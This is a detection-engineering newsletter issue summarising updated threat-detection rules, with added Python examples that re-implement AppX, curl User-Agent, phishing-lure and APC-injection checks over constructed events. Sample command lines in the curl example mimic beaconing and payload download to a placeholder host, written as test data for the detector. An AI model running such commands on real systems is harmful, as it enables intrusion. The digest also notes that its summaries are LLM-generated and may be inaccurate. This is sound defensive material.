Detections Digest #20251229
The issue highlights key updates from 4 repos, including 2 new and 6 modified Sigma, KQL, Fibratus and Sublime Security detection rules.
This week’s update highlights the most significant changes to detection rules from 4 of the 50+ monitored GitHub repositories. Between Dec 22 and Dec 29, 2025, contributors added 2 new rules and updated 6 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
New and modified rules target application sideloading using AppX packages, a technique used by malware like BazarLoader. One rule detects staging in common user directories; a related rule for registration from uncommon paths was refined with exclusions to lower false positives. (SigmaHQ/sigma)
A new KQL query hunts for suspicious macOS Launch Daemons created in /Library/LaunchDaemons/. The logic identifies persistence by checking for low global prevalence, file age, and invalid certificate signatures. (benscha/KQLAdvancedHunting)
🚀 Make updates from this digest operational →
All detection rules from this digest are available in our MISP and STIX/TAXII feeds ready for direct integration into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.
Table Of Contents
Corporate repositories (2)
SigmaHQ/sigma (+1, ✎2)
sublime-security/sublime-rules (✎1)
Personal repositories (2)
benscha/KQLAdvancedHunting (+1)
rabbitstack/fibratus (✎3)
Corporate repositories (2)
SigmaHQ/sigma (+1, ✎2)
+ New rules
A new rule detects application sideloading using AppX packages staged in common user directories like Temp, Downloads, or Public. This technique is associated with malware such as BazarLoader. The detection monitors Event ID 854 from the Microsoft-Windows-AppXDeploymentServer/Operational log. (AppX Located in Known Staging Directory Added to Deployment Pipeline)
✎ Modified rules
Detection for malicious AppX package registration was refined. The rule now has broader file path filtering and adds exclusions for legitimate WinGet and Windows Update installations, reducing false positives. (AppX Located in Uncommon Directory Added to Deployment Pipeline)
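The two AppX rules above (the new staging-directory rule and the refined uncommon-directory rule) reduce to path checks over Event ID 854. The Python below is an added example for this digest, not the Sigma rules' own logic: the "Path" field name, the sample paths, the list of common install roots and the WinGet/Windows Update exclusion paths are all assumptions. The page does not say whether the staging rule also exempts WinGet's Temp cache, so the example leaves that rule strict and applies the exclusions only to the uncommon-directory rule.

```python
# Constructed sample events, modelled on Microsoft-Windows-AppXDeploymentServer/Operational
# Event ID 854 (a package entering the deployment pipeline). The "Path" field name and every
# path below are assumptions made for this example, not copied from the Sigma rules or real logs.
SAMPLE_EVENTS = [
    {"EventID": 854, "Path": r"C:\Users\alice\Downloads\Update.appx"},
    {"EventID": 854, "Path": r"C:\Users\alice\AppData\Local\Temp\Invoice.msix"},
    {"EventID": 854, "Path": r"C:\Users\Public\Documents\app.appxbundle"},
    {"EventID": 854, "Path": r"C:\Program Files\WindowsApps\Contoso.App_1.0.0.0_x64__abc123\AppxManifest.xml"},
    {"EventID": 854, "Path": r"C:\Users\alice\AppData\Local\Temp\WinGet\Contoso.App.1.0.0\app.msix"},
    {"EventID": 854, "Path": r"C:\Windows\SoftwareDistribution\Download\1a2b3c\pkg.appx"},
    {"EventID": 854, "Path": r"D:\share\tools\helper.appx"},
    {"EventID": 850, "Path": r"C:\Users\alice\Downloads\Update.appx"},  # other event ID: out of scope
]

# Patterns are compared against a lower-cased, forward-slash form of the path (see _norm).
STAGING_DIRS = ("/temp/", "/downloads/", "/users/public/")                  # user-writable drop locations
COMMON_ROOTS = ("c:/program files/windowsapps/", "c:/windows/systemapps/")  # where Store/inbox apps live
EXCLUSIONS = (                                               # legitimate installers (assumed paths)
    "/appdata/local/temp/winget/",                           # WinGet package cache
    "c:/windows/softwaredistribution/download/",             # Windows Update download directory
)


def _norm(path: str) -> str:
    """Lower-case and use forward slashes so matching is case- and separator-insensitive."""
    return path.lower().replace("\\", "/")


def staging_dir_rule(event) -> bool:
    """'AppX Located in Known Staging Directory': Event ID 854 with the package under
    Temp, Downloads or Users\\Public. Kept strict; no installer exclusions applied."""
    if event.get("EventID") != 854:
        return False
    p = _norm(event.get("Path", ""))
    return any(d in p for d in STAGING_DIRS)


def uncommon_dir_rule(event, exclusions=EXCLUSIONS) -> bool:
    """'AppX Located in Uncommon Directory': Event ID 854 with the package outside the usual
    install roots, minus the legitimate installers (WinGet cache, Windows Update downloads)."""
    if event.get("EventID") != 854:
        return False
    p = _norm(event.get("Path", ""))
    if p.startswith(COMMON_ROOTS):
        return False
    if any(x in p for x in exclusions):
        return False
    return True


def run_rules(events, exclusions=EXCLUSIONS):
    """Evaluate both rules over a batch of events; returns (rule_name, path) per hit."""
    hits = []
    for ev in events:
        if staging_dir_rule(ev):
            hits.append(("staging", ev["Path"]))
        if uncommon_dir_rule(ev, exclusions):
            hits.append(("uncommon", ev["Path"]))
    return hits


if __name__ == "__main__":
    for rule, path in run_rules(SAMPLE_EVENTS):
        print(f"{rule:9s} {path}")
    print("hits without exclusions:", len(run_rules(SAMPLE_EVENTS, exclusions=())))
```

Running it with the exclusions removed shows the false positives the refinement was aimed at: the WinGet cache and the Windows Update download directory both trip the uncommon-directory rule until they are exempted, while the high-fidelity staging rule keeps firing on Downloads, Temp and Public regardless.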
Detection for curl.exe specifying a custom User-Agent was expanded. The logic now includes both the short form ‘-H’ and long form ‘--header’ command-line flags, improving coverage for this C2 communication technique. (Curl Web Request With Potential Custom User-Agent)
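The curl rule change is about argument forms, so the useful check is a small command-line parser that recognises every spelling under which curl.exe can set a User-Agent. The Python below is an added example, not the Sigma rule's logic; the sample command lines are constructed, and the tokeniser, the first-token stand-in for the Image field and the decision to also cover curl's dedicated -A/--user-agent option (which the digest summary does not mention) are this example's own choices.

```python
import re

# Tokeniser for Windows-style command lines: keeps double-quoted arguments whole.
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
# A header argument that sets User-Agent, e.g. "User-Agent: Mozilla/5.0" or "user-agent:x".
_UA_HEADER_RE = re.compile(r"^\s*user-agent\s*:\s*(.*?)\s*$", re.IGNORECASE)


def tokenize(cmdline: str) -> list[str]:
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(cmdline)]


def custom_user_agent(cmdline: str):
    """Return the User-Agent value curl.exe was told to send, or None.

    Covers -H / --header carrying a User-Agent header (the forms the rule was extended
    to), the --header=... spelling, and curl's dedicated -A / --user-agent option.
    """
    argv = tokenize(cmdline)
    if not argv:
        return None
    # A real Sigma rule keys on the Image field; here the first token stands in for it.
    image = argv[0].lower().replace("\\", "/").rsplit("/", 1)[-1]
    if image not in ("curl.exe", "curl"):
        return None
    i = 1
    while i < len(argv):
        tok = argv[i]
        nxt = argv[i + 1] if i + 1 < len(argv) else None
        if tok in ("-A", "--user-agent") and nxt is not None:
            return nxt
        if tok.startswith("--user-agent="):
            return tok[len("--user-agent="):]
        header = None
        if tok in ("-H", "--header") and nxt is not None:
            header, i = nxt, i + 1          # consume the header value too
        elif tok.startswith("--header="):
            header = tok[len("--header="):]
        if header is not None:
            m = _UA_HEADER_RE.match(header)
            if m:
                return m.group(1)
        i += 1
    return None


def scan(cmdlines):
    """Return (cmdline, user_agent) for every command line the check would flag."""
    out = []
    for line in cmdlines:
        ua = custom_user_agent(line)
        if ua is not None:
            out.append((line, ua))
    return out


# Constructed sample process command lines (not captured telemetry).
SAMPLES = [
    r'"C:\Windows\System32\curl.exe" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0)" https://example.test/beacon',
    r'curl.exe --header "user-agent: ua-7f3a" -o C:\Users\Public\stage.bin https://example.test/p',
    r'curl.exe --header=User-Agent:Loader/1.0 https://example.test/c',
    r'curl.exe -A "Bot/2.1" https://example.test/a',
    r'curl.exe -H "Accept: */*" https://example.test/ok',          # header set, but not User-Agent
    r'powershell.exe -c curl -H "User-Agent: x"',                   # not curl.exe as the image
]

if __name__ == "__main__":
    for line, ua in scan(SAMPLES):
        print(f"{ua!r:40s} <- {line}")
```

The header match is case-insensitive and tolerant of whitespace around the colon because curl accepts both, and an attacker choosing `user-agent:` over `User-Agent:` is exactly the kind of trivial evasion a `contains 'User-Agent:'` string match would miss.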
sublime-security/sublime-rules (✎1)
✎ Modified rules
Detection of HR-themed phishing lures was broadened. The logic now inspects the subject.base field and includes additional keywords like ‘contract’ and ‘empl[o0]yment’. Coverage was also extended to include pptx attachments, and the ‘merit’ keyword was refined with a word boundary for more precise matching. (Attachment: Suspicious employee policy update document lure)
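The interesting detail in the Sublime change is the word boundary on 'merit', since a bare substring match also hits words like "Emeritus". The Python below is an added example of that subject-plus-attachment logic, not the rule's own MQL: the messages are constructed, `subject_base()` is this example's approximation of what Sublime's subject.base field does (reply/forward prefixes stripped), and the extra keywords 'policy' and 'handbook' and the document extension list other than pptx are illustrative assumptions.

```python
import re

# Reply/forward prefixes stripped to approximate Sublime's subject.base (assumption about that field).
_PREFIX_RE = re.compile(r"^\s*(re|fw|fwd)\s*:\s*", re.IGNORECASE)


def subject_base(subject: str) -> str:
    """Strip any number of leading RE:/FW:/FWD: prefixes."""
    while True:
        stripped = _PREFIX_RE.sub("", subject, count=1)
        if stripped == subject:
            return subject.strip()
        subject = stripped


# HR-lure terms. 'merit' is anchored with \b on both sides so "Emeritus" or "meritocracy" do not
# match; 'empl[o0]yment' catches the zero-for-o substitution. 'policy' and 'handbook' are
# illustrative additions for this example, not quoted from the rule.
LURE_TERMS = re.compile(r"\bmerit\b|empl[o0]yment|contract|policy|handbook", re.IGNORECASE)
# The same list without the word boundary, to show why the refinement was made.
LURE_TERMS_NO_BOUNDARY = re.compile(r"merit|empl[o0]yment|contract|policy|handbook", re.IGNORECASE)

# Document types the lure may ride in; pptx is the extension the update added (list is assumed).
DOC_EXTS = ("doc", "docx", "pdf", "pptx")


def has_document_attachment(attachments) -> bool:
    return any(name.lower().rsplit(".", 1)[-1] in DOC_EXTS for name in attachments if "." in name)


def is_hr_lure(msg, terms=LURE_TERMS) -> bool:
    """Flag when the base subject carries a lure term AND a document attachment is present."""
    return bool(terms.search(subject_base(msg["subject"]))) and has_document_attachment(msg["attachments"])


def flagged(messages, terms=LURE_TERMS):
    return [m["subject"] for m in messages if is_hr_lure(m, terms)]


# Constructed sample messages (subject + attachment file names only).
MESSAGES = [
    {"subject": "RE: Updated Employee Policy - action required", "attachments": ["Policy_Update.pptx"]},
    {"subject": "Your empl0yment contract - review", "attachments": ["contract.docx"]},
    {"subject": "Merit increase notification", "attachments": ["merit.pdf"]},
    {"subject": "Lecture by Professor Emeritus Smith", "attachments": ["slides.pptx"]},  # 'Emeritus' contains 'merit'
    {"subject": "Employment verification", "attachments": ["photo.png"]},               # no document attached
    {"subject": "Fwd: Q3 contract renewal", "attachments": []},                          # no attachment at all
]

if __name__ == "__main__":
    print("with \\bmerit\\b:   ", flagged(MESSAGES))
    print("without boundary:", flagged(MESSAGES, LURE_TERMS_NO_BOUNDARY))
```

Swapping in `LURE_TERMS_NO_BOUNDARY` adds the "Professor Emeritus" message to the hits, which is the false positive the word boundary removes; the attachment condition is what keeps plain "Employment verification" mail without a document out of scope.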
Personal repositories (2)
benscha/KQLAdvancedHunting (+1)
+ New rules
A new KQL hunting rule detects suspicious macOS Launch Daemons. The rule monitors file creation or modification in the /Library/LaunchDaemons/ directory, identifying threats by filtering for low global prevalence, file age over 90 days, and invalid or non-Microsoft certificates. (Hunting suspicious Daemons on macOS)
rabbitstack/fibratus (✎3)
✎ Modified rules
Two Fibratus rules detecting registry modifications for persistence and defense evasion were updated for schema compatibility. The change from the deprecated registry.value field to registry.data keeps detections for Startup folder path changes and Windows Defender tampering operational. (Windows Defender protection tampering via registry, Suspicious Startup shell folder modification)
Detection for DLL loading via Asynchronous Procedure Call (APC) was refined to reduce false positives. The rule now also requires a KernelBase.dll!Sleep* frame in the thread callstack, narrowing the detection to sleep obfuscation and process injection techniques that deliver the APC to a thread parked in a sleep call. (DLL loaded via APC queue)
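The Fibratus refinement is a callstack-pattern conjunction, so the clearest illustration is the old and new predicates side by side over a few image-load events. The Python below is an added example, not the Fibratus rule text: the events and their callstacks are constructed, `imatches()` is this example's case-insensitive glob stand-in for Fibratus's operator of that name, and using an ntdll.dll!KiUserApcDispatcher frame as the "loaded via APC" indicator is an assumption made here, not something the digest states.

```python
import fnmatch


def imatches(symbols, patterns) -> bool:
    """Case-insensitive glob match of any callstack symbol against any pattern
    (assumed here to mirror the semantics of Fibratus's `imatches` operator)."""
    return any(fnmatch.fnmatchcase(sym.lower(), pat.lower()) for sym in symbols for pat in patterns)


APC_DISPATCH = ["ntdll.dll!KiUserApcDispatcher*"]   # user-mode APC delivery frame (assumed indicator)
SLEEP_FRAMES = ["KernelBase.dll!Sleep*"]             # Sleep / SleepEx, per the digest


def loaded_via_apc(event) -> bool:
    """Pre-refinement logic: any image load whose callstack passed through the APC dispatcher."""
    return event["type"] == "LoadImage" and imatches(event["callstack"], APC_DISPATCH)


def loaded_via_apc_from_sleep(event) -> bool:
    """Refined logic: the APC must also have been delivered while the thread sat in Sleep*."""
    return loaded_via_apc(event) and imatches(event["callstack"], SLEEP_FRAMES)


# Constructed image-load events; callstacks are innermost frame first and are illustrative only.
EVENTS = [
    {   # sleep-obfuscation style: APC queued to a thread parked in SleepEx
        "type": "LoadImage", "image": r"C:\Users\Public\payload.dll",
        "callstack": ["ntdll.dll!LdrLoadDll", "KernelBase.dll!LoadLibraryExW",
                      "ntdll.dll!KiUserApcDispatcher", "KernelBase.dll!SleepEx",
                      "KernelBase.dll!Sleep", "app.exe!main"],
    },
    {   # APC delivered during an alertable wait, not a sleep: the old rule fired here
        "type": "LoadImage", "image": r"C:\Windows\System32\mswsock.dll",
        "callstack": ["ntdll.dll!LdrLoadDll", "KernelBase.dll!LoadLibraryExW",
                      "ntdll.dll!KiUserApcDispatcher", "KernelBase.dll!WaitForSingleObjectEx",
                      "app.exe!worker"],
    },
    {   # ordinary LoadLibrary call from the main thread
        "type": "LoadImage", "image": r"C:\Windows\System32\version.dll",
        "callstack": ["ntdll.dll!LdrLoadDll", "KernelBase.dll!LoadLibraryW", "app.exe!main"],
    },
]


def run(events, rule):
    """Images flagged by the given predicate."""
    return [e["image"] for e in events if rule(e)]


if __name__ == "__main__":
    print("before refinement:", run(EVENTS, loaded_via_apc))
    print("after refinement: ", run(EVENTS, loaded_via_apc_from_sleep))
```

The second event is the kind of benign APC-driven load the extra Sleep* condition is meant to drop; the trade-off is that an injector which queues its APC to a thread blocked in an alertable wait rather than a sleep now falls outside this rule.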
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM from the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We’d be happy to help — contact us.